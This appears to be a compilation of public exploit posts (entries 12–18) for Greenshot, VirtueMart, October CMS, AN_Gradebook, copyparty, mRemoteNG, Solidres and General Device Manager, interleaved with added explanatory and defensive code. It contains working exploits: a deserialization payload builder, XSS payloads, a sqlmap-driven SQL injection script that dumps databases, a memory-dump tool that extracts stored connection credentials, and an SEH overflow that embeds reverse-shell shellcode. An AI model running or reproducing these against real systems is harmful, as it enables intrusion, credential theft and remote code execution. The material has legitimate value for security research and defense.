# Software Link: https://getgreenshot.org/downloads/
# Version: 1.2.6.10
# Tested on: windows 10.0.19045 N/A build 19045
# CVE : CVE-2023-34634
#
# GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format
# A stream of .Net objects is serialized and insecurely deserialized when a *.greenshot file is opened with the software
# On a default install the *.greenshot file extension is associated with the program, so double-clicking a *.greenshot file
# will lead to arbitrary code execution
#
# Generate the payload. You need ysoserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net
./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw

#load the payload
$payload = Get-Content .\payload.bin -Encoding Byte

# retrieve the length of the payload
$length = $payload.Length

# load the required assembly to craft a PNG file
Add-Type -AssemblyName System.Drawing

# the following lines create a png file with some text.
# Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell
$filename = "$home\poc.greenshot"
$bmp = new-object System.Drawing.Bitmap 250,61
$font = new-object System.Drawing.Font Consolas,24
$brushBg = [System.Drawing.Brushes]::Green
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10)
$graphics.Dispose()
$bmp.Save($filename)

# append the payload to the PNG file
$payload | Add-Content -Path $filename -Encoding Byte -NoNewline

# append the length of the payload
[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline

# append the signature
"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii

# launch greenshot. Calc.exe should be executed
Invoke-Item $filename
  12. # Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 24/07/2023
# Vendor: VirtueMart Team
# Vendor Homepage: https://www.virtuemart.net/
# Software Link: https://demo.virtuemart.net/
# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/virtuemart/
# Version: 4.0.12
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /product-variants

GET parameter 'keyword' is vulnerable to RXSS

https://website/product-variants?keyword=[XSS]&view=category&option=com_virtuemart&virtuemart_category_id=11&Itemid=925

[XSS Payload]: uk9ni"><script>alert(1)</script>a6di2

[-] Done
  13. #Exploit Title: October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 29 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://octobercms.com
#Version: v3.4.4
#Tested on: Ubuntu 22.04
#CVE : N/A

# Proof of Concept:
1– Install the system through the website and log in with any user with file upload authority.
2– Select "Media" in the top menu. Prepare an SVG file using the payload below.
3– Upload the SVG file and call the relevant file from the directory it is in. XSS will be triggered.

#Stored XSS Payload:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(1);
  </script>
</svg>
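The Perch, Availability Booking Calendar and October CMS reports above all rely on the same file: an SVG carrying a <script> element that the application stores and later serves as an image. The upload check below is an added example, not code from any of those projects; the policy it enforces (no script or foreignObject elements, no event-handler attributes, no javascript:/vbscript:/data: hrefs, no entity declarations) is an assumption to adapt, and the two sample files are constructed.

```python
import xml.etree.ElementTree as ET

# Elements that can execute script or embed arbitrary HTML inside an SVG.
BLOCKED_ELEMENTS = {'script', 'foreignObject'}
BLOCKED_URL_SCHEMES = {'javascript', 'vbscript', 'data'}


def _local_name(qname: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on qualified names."""
    return qname.split('}', 1)[1] if qname.startswith('{') else qname


def _url_scheme(value: str) -> str:
    head = value.strip().lower()
    return head.split(':', 1)[0] if ':' in head else ''


def svg_violations(data: bytes) -> list:
    """Return the policy violations found in an uploaded SVG; an empty list means it passed."""
    problems = []
    # Images never need entity declarations; refusing them sidesteps entity-expansion tricks.
    if b'<!ENTITY' in data:
        problems.append('entity declaration in DOCTYPE')
    try:
        root = ET.fromstring(data)  # expat does not fetch the external DTD referenced by the DOCTYPE
    except ET.ParseError as exc:
        return problems + [f'not well-formed XML: {exc}']
    if _local_name(root.tag) != 'svg':
        problems.append(f'root element is <{_local_name(root.tag)}>, not <svg>')
    for el in root.iter():
        name = _local_name(el.tag)
        if name in BLOCKED_ELEMENTS:
            problems.append(f'<{name}> element')
        for attr, value in el.attrib.items():
            attr_name = _local_name(attr)  # covers both href and xlink:href
            if attr_name.lower().startswith('on'):
                problems.append(f'event handler attribute {attr_name} on <{name}>')
            if attr_name == 'href' and _url_scheme(value) in BLOCKED_URL_SCHEMES:
                problems.append(f'{_url_scheme(value)}: URL in href on <{name}>')
    return problems


def accept_svg_upload(data: bytes) -> bool:
    return not svg_violations(data)


# Constructed samples: the first is the payload shared by the reports above,
# the second is the same drawing without the script element.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert("XSS");</script>
</svg>"""

BENIGN_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>"""

if __name__ == '__main__':
    print('malicious:', svg_violations(MALICIOUS_SVG))
    print('benign:', svg_violations(BENIGN_SVG))
```

Serving user uploads from a separate origin, or with Content-Disposition: attachment and a sandboxing Content-Security-Policy, limits what a file that slips past the check can do in the application's origin.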
  14. #!/usr/bin/python3
# Exploit Title: WordPress Plugin AN_Gradebook <= 5.0.1 - Subscriber+ SQLi
# Date: 2023-07-26
# Exploit Author: Lukas Kinneberg
# Github: https://github.com/lukinneberg/CVE-2023-2636
# Vendor Homepage: https://wordpress.org/plugins/an-gradebook/
# Software Link: https://github.com/lukinneberg/CVE-2023-2636/blob/main/an-gradebook.7z
# Tested on: WordPress 6.2.2
# CVE: CVE-2023-2636

from datetime import datetime
import os
import requests
import json

# User Input:
target_ip = 'CHANGE_THIS'
target_port = '80'
username = 'hacker'
password = 'hacker'

banner = '''
 ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||C |||V |||E |||- |||2 |||0 |||2 |||3 |||- |||2 |||6 |||3 |||6 ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|

Exploit Author: Lukas Kinneberg
'''
print(banner)
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + '/wp-login.php'
check = session.get(auth_url)

# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# SQL-Injection (Exploit):
# Generate payload for sqlmap
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}', '')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')
print('[*] Payload for SQL-Injection:')

# Enter the URL path of the course after the target_port below
exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + r'/wp-admin/admin-ajax.php?action=course&id=3" '
exploitcode_risk = '--level 2 --risk 2 '
exploitcode_cookie = '--cookie="' + cookie + '" '

# SQLMAP Printout
print(' Sqlmap options:')
print(' -a, --all           Retrieve everything')
print(' -b, --banner        Retrieve DBMS banner')
print(' --current-user      Retrieve DBMS current user')
print(' --current-db        Retrieve DBMS current database')
print(' --passwords         Enumerate DBMS users password hashes')
print(' --tables            Enumerate DBMS database tables')
print(' --columns           Enumerate DBMS database table column')
print(' --schema            Enumerate DBMS schema')
print(' --dump              Dump DBMS database table entries')
print(' --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')

exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
15. # Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
# Date: 23/07/2023
# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6
# Version: <=1.8.6
# Tested on: Debian Linux
# CVE : CVE-2023-38501

#Description
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) attack. A vulnerability that exists in the web interface of the application could allow an attacker to execute malicious JavaScript code by tricking users into accessing a malicious link.

#POC
https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E
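Note the shape of the PoC value: `y`, then two `%0D%0A` pairs, then the HTML. A value that carries CR LF CR LF only helps an attacker if it is copied into a response header, because the empty line ends the header block and whatever follows is parsed as the body. The following is an added example, not copyparty's code: it decodes the PoC URL, shows how a hypothetical handler that concatenates the parameter into a `Set-Cookie` header turns it into a body of attacker HTML, and the one-line check that stops it. The header assembly is illustrative only and does not claim to be how copyparty builds its responses.

```python
"""Added example (not copyparty code): why CR/LF must never reach a response header."""
from urllib.parse import parse_qs, urlsplit

# PoC URL from the post above.
POC_URL = "https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E"


def query_value(url, name):
    """Percent-decode one query parameter the way a server framework would."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def unsafe_response(value):
    """Hypothetical handler: copies the raw parameter into a Set-Cookie header by
    string concatenation. CR LF CR LF inside the value terminates the headers."""
    return "HTTP/1.1 200 OK\r\nSet-Cookie: k304=%s\r\n\r\n" % value


def header_value(value):
    """Reject anything that can break out of a header line."""
    if any(c in value for c in "\r\n\x00"):
        raise ValueError("CR, LF or NUL in header value")
    return value


def safe_response(value):
    return "HTTP/1.1 200 OK\r\nSet-Cookie: k304=%s\r\n\r\n" % header_value(value)


def split_response(raw):
    """Return (header block, body) as an HTTP client would see them."""
    head, _, body = raw.partition("\r\n\r\n")
    return head, body


if __name__ == "__main__":
    value = query_value(POC_URL, "k304")
    head, body = split_response(unsafe_response(value))
    print("headers:", head.splitlines())
    print("body   :", body.strip())   # the attacker's <img ...> tag
    try:
        safe_response(value)
    except ValueError as exc:
        print("rejected:", exc)
```

Most modern HTTP libraries refuse CR/LF in header values already; the bug pattern survives in hand-rolled servers and in code that writes raw bytes to the socket. Validating the value for the header and HTML-escaping it for the body are two separate controls, and the PoC needs only the first one to be missing.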
16. # Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory
# Google Dork: -
# Date: 21.07.2023
# Exploit Author: Maximilian Barz
# Vendor Homepage: https://mremoteng.org/
# Software Link: https://mremoteng.org/download
# Version: mRemoteNG <= v1.77.3.1784-NB
# Tested on: Windows 11
# CVE : CVE-2023-30367

/*
Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to store and manage multi-protocol connection configurations to remotely connect to systems. mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up, even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text through a memory dump and thus compromise user credentials when no custom password encryption key has been set. This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.

Full Exploit and mRemoteNG config file decryption + password bruteforce python script:
https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper
*/

using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;

namespace mRemoteNGDumper
{
    public static class Program
    {
        public enum MINIDUMP_TYPE
        {
            MiniDumpWithFullMemory = 0x00000002
        }

        [StructLayout(LayoutKind.Sequential, Pack = 4)]
        public struct MINIDUMP_EXCEPTION_INFORMATION
        {
            public uint ThreadId;
            public IntPtr ExceptionPointers;
            public int ClientPointers;
        }

        [DllImport("kernel32.dll")]
        static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

        [DllImport("Dbghelp.dll")]
        static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);

        static void Main(string[] args)
        {
            string input;
            bool configfound = false;
            StringBuilder filesb;
            StringBuilder linesb;
            List<string> configs = new List<string>();

            Process[] localByName = Process.GetProcessesByName("mRemoteNG");
            if (localByName.Length == 0)
            {
                Console.WriteLine("[-] No mRemoteNG process was found. Exiting");
                System.Environment.Exit(1);
            }

            string assemblyPath = Assembly.GetEntryAssembly().Location;
            Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);
            string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";
            FileStream procdumpFileStream = File.Create(dumpFileName);
            MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();

            // A full memory dump is necessary in the case of a managed application, otherwise no information
            // regarding the managed code will be available
            MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;
            MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);
            procdumpFileStream.Close();

            filesb = new StringBuilder();
            Console.WriteLine("[+] Searching for configuration files in memory dump.");
            using (StreamReader reader = new StreamReader(dumpFileName))
            {
                while (reader.Peek() >= 0)
                {
                    input = reader.ReadLine();
                    string pattern = @"(\<Node)(.*)(?=\/>)\/>";
                    Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);
                    if (m.Success)
                    {
                        configfound = true;
                        foreach (string config in m.Value.Split('>'))
                        {
                            configs.Add(config);
                        }
                    }
                }
                reader.Close();

                if (configfound)
                {
                    string currentDir = System.IO.Directory.GetCurrentDirectory();
                    string dumpdir = currentDir + "/dump";
                    if (!Directory.Exists(dumpdir))
                    {
                        Directory.CreateDirectory(dumpdir);
                    }
                    string savefilepath;
                    for (int i = 0; i < configs.Count; i++)
                    {
                        if (!string.IsNullOrEmpty(configs[i]))
                        {
                            savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";
                            Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);
                            using (StreamWriter writer = new StreamWriter(savefilepath))
                            {
                                writer.Write(configs[i] + '>');
                                writer.Close();
                            }
                        }
                    }
                    Console.WriteLine("[+] Done!");
                    Console.WriteLine("[+] Deleting memorydump file!");
                    File.Delete(dumpFileName);
                    Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \"" + currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"");
                }
                else
                {
                    Console.WriteLine("[-] No configuration file found in memorydump. Exiting");
                    Console.WriteLine("[+] Deleting memorydump file!");
                    File.Delete(dumpFileName);
                }
            }
        }
    }
}
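The C# tool above reads the minidump line by line through a UTF-8 `StreamReader` and keeps the first `<Node ... />` match per line. The following is an added example, not the post author's code and not part of mRemoteNG: a Python scanner that runs the same idea over a dump taken with any tool (procdump, Task Manager, `MiniDumpWriteDump`), finds every `<Node .../>` element rather than one per line, parses its attributes, and also tries the UTF-16-LE layout that .NET uses for `System.String`, at both byte alignments. The sample dump bytes and the attribute values in them are constructed for the example; only the `Node` element name comes from the post.

```python
"""Added example (not mRemoteNG or the post author's code): carve <Node .../> entries
from a process memory dump, in both single-byte and UTF-16-LE encodings."""
import re

NODE_TEXT = r'<Node\s[^<>]*?/>'
NODE_BYTES = re.compile(NODE_TEXT.encode(), re.I)   # ASCII/UTF-8 as it sits in a byte buffer
NODE_UTF16 = re.compile(NODE_TEXT, re.I)            # applied after decoding as UTF-16-LE
ATTR_RE = re.compile(r'([\w:.-]+)="([^"]*)"')

# Constructed sample: two single-byte nodes and one UTF-16-LE node embedded in noise.
# Attribute values are made up; the real confCons.xml attribute set is not assumed here.
UTF16_NODE = ('<Node Name="w16" Type="Connection" Username="adm" '
              'Hostname="10.0.0.9" Protocol="RDP" />').encode("utf-16-le")
SAMPLE_DUMP = (
    b"MDMP\x93\xa7\x00\x00" * 2
    + b'<Node Name="db01" Type="Connection" Username="svc_backup" Domain="CORP" '
      b'Password="QUVTLUdDTS1jaXBoZXJ0ZXh0" Hostname="10.0.0.5" Protocol="SSH2" />'
    + b"\xff\xfe\x00\x00" * 4
    + b'<Node Name="jump" Type="Connection" Username="root" Hostname="jump.internal" Protocol="RDP" />'
    + b"\x07"
    + UTF16_NODE
    + b"\x00" * 8
)


def parse_node(text):
    """Turn one <Node .../> element into a dict of its attributes."""
    return dict(ATTR_RE.findall(text))


def find_nodes(dump):
    """Return every distinct Node element found in the dump, in discovery order."""
    found, seen = [], set()

    def keep(attrs, encoding):
        key = tuple(sorted(attrs.items()))
        if attrs and key not in seen:
            seen.add(key)
            attrs = dict(attrs)
            attrs["_encoding"] = encoding
            found.append(attrs)

    # Pass 1: single-byte text, e.g. a decoded XML buffer held as byte[] or a UTF-8 stream.
    for m in NODE_BYTES.finditer(dump):
        keep(parse_node(m.group(0).decode("utf-8", "replace")), "utf-8")

    # Pass 2: UTF-16-LE, the in-memory form of a .NET string. A string can start on an
    # odd offset, so decode from both alignments; undecodable pairs are skipped.
    for start in (0, 1):
        text = dump[start:].decode("utf-16-le", "ignore")
        for m in NODE_UTF16.finditer(text):
            keep(parse_node(m.group(0)), "utf-16-le")
    return found


if __name__ == "__main__":
    for node in find_nodes(SAMPLE_DUMP):
        print({k: node[k] for k in ("Name", "Username", "Hostname", "_encoding") if k in node})
```

The second pass is the one that matters for a managed application: anything the program has touched as a `string` is in memory as UTF-16, so a scanner that only greps bytes for `<Node` will miss it. The `Password` values recovered this way are still in the file's encrypted encoding; decrypting them is what the post's linked `mremoteng_decrypt.py` does and is out of scope here.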
17. # Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 28/07/2023
# Vendor: Solidres Team
# Vendor Homepage: http://solidres.com/
# Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/
# Demo: http://demo.solidres.com/joomla
# Version: 2.13.3
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

The attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

GET parameter 'show' is vulnerable to XSS
GET parameter 'reviews' is vulnerable to XSS
GET parameter 'type_id' is vulnerable to XSS
GET parameter 'distance' is vulnerable to XSS
GET parameter 'facilities' is vulnerable to XSS
GET parameter 'categories' is vulnerable to XSS
GET parameter 'prices' is vulnerable to XSS
GET parameter 'location' is vulnerable to XSS
GET parameter 'Itemid' is vulnerable to XSS

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS]

https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18&

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS]

https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14

[-] Done
18. # Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Date: 30.07.2023
# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
# Software Link 2: https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
# Exploit Author: Ahmet Ümit BAYRAM
# Tested Version: 2.5.2.2
# Tested on: Windows 10 64bit

# 1.- Run python code : exploit.py
# 2.- Open pwned.txt and copy all content to clipboard
# 3.- Open Device Manage and press Add Device
# 4.- Paste the content of pwned.txt into the 'IP Address'
# 5.- Click 'OK'
# 6.- nc.exe local IP Port 1337 and you will have a bind shell
# 7.- R.I.P. Condor <3

import struct

offset = b"A" * 1308
nseh = b"\xEB\x06\x90\x90"  # jmp short
seh = struct.pack('<I', 0x10081827)  # 0x10081827 : pop ebx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)
nops = b"\x90" * 32

#shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
shellcode = b""
shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"

final_payload = offset + nseh + seh + nops + shellcode

# write the final payload to a file
try:
    with open('pwned.txt', 'wb') as f:
        print("[+] Creating %s bytes evil payload..." % len(final_payload))
        f.write(final_payload)
        f.close()
    print("[+] File created!")
except:
    print("File cannot be created!")
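Two things decide whether a payload like the one above lands: the nSEH/SEH layout has to be byte-exact (`EB 06` is a short jump counted from the end of the 2-byte instruction, so it hops over the two padding NOPs and the 4-byte handler address), and nothing in the buffer may contain a byte the input path mangles, which for a value pasted into a text field is at least the `\x00\x0a\x0d` set the msfvenom line excludes. The following is an added example, not the post author's exploit: it builds the same layout from its parameters, reports where each part sits, and scans the result for bad characters. The offset and gadget address are the ones in the post; the 16-byte `\xcc` stand-in for shellcode is constructed so the block runs without the encoded payload. The post's shellcode is `windows/shell_reverse_tcp`, so the listener belongs on the LHOST side.

```python
"""Added example (not the post author's code): SEH payload layout and bad-character check."""
import struct

BAD_CHARS = b"\x00\x0a\x0d"   # the -b list passed to msfvenom in the post


def short_jmp(skip):
    """Encode `jmp short` (EB rel8) and pad with two NOPs to fill the 4-byte nSEH slot.
    rel8 is relative to the end of the 2-byte instruction."""
    if not 0 <= skip <= 0x7F:
        raise ValueError("rel8 must be 0..127")
    return bytes([0xEB, skip, 0x90, 0x90])


def build_seh_payload(offset, seh_handler, shellcode, nop_count=32):
    """filler | nSEH (jmp +6) | SEH (POP POP RET, little-endian) | NOP sled | shellcode.
    The +6 skips the two padding NOPs (2) plus the handler address (4)."""
    nseh = short_jmp(6)
    seh = struct.pack("<I", seh_handler)
    return b"A" * offset + nseh + seh + b"\x90" * nop_count + shellcode


def describe_layout(offset, nop_count=32):
    """Offsets of each part, plus where the short jump actually lands."""
    nseh_at = offset
    seh_at = offset + 4
    return {
        "nseh": nseh_at,
        "seh": seh_at,
        "jmp_target": nseh_at + 2 + 6,      # end of the jmp instruction + rel8
        "nops": seh_at + 4,
        "shellcode": seh_at + 4 + nop_count,
    }


def find_bad_chars(payload, bad=BAD_CHARS):
    """First offset of every forbidden byte present; empty dict means the buffer is clean."""
    return {b: payload.index(bytes([b])) for b in bad if bytes([b]) in payload}


if __name__ == "__main__":
    stand_in = b"\xcc" * 16                  # constructed placeholder, int3 x16
    payload = build_seh_payload(1308, 0x10081827, stand_in)
    layout = describe_layout(1308)
    print("layout:", layout)
    print("bad chars:", find_bad_chars(payload) or "none")
    # A gadget address with a NUL byte would truncate the paste at the SEH slot:
    print("bad chars with 0x00401000:", find_bad_chars(build_seh_payload(4, 0x00401000, b"A")))
```

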